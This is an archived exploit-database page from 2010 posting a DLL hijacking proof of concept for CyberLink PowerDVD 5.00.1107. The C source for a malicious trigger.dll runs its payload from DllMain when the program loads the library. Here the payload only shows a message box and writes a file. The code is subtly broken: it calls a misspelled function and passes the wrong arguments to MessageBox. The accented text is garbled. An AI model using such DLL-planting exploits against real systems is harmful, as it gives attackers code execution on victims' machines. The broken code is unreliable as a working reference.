[local exploits] - PowerDVD.exe 5.00.1107 DLL Hijacking Expl
Posted on 22 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>PowerDVD.exe 5.00.1107 DLL Hijacking Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='PowerDVD.exe 5.00.1107 DLL Hijacking Exploit by Inj3cti0n P4ck3t in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>============================================ PowerDVD.exe 5.00.1107 DLL Hijacking Exploit ============================================ /* [*] Author: Inj3cti0n P4ck3t [*] e-mail: fer_henrick@hotmail.com [*] Date: 18/10/2010 [*] Name BUG: PowerDVD 5.00.1107 DLL Hijacking Exploit (trigger.dll) [*] System tested: Windows XP (Version 5.1 Service Pack 3) [*] PowerDVD.exe Version: 5.00.1107 [*] Software to Download: Nгo disponнvel [*] Application Path: C:Arquivos de programasCyberLinkPowerDVDPowerDVD.exe [*] DLL Found => trigger.dll Greetz: fvox */ #include <windows.h> #include <stdio.h> int testando() { MessageBox(0, "Testando PoC", MB_OK); FILE *fp; fp = fopen("Inj3cti0nP4ck3t.txt", "w"); fwrite("it works ;-)", 1, 12, fp); fclose(fp); exit(1); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { testandp(); return TRUE; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-22]</pre></body></html>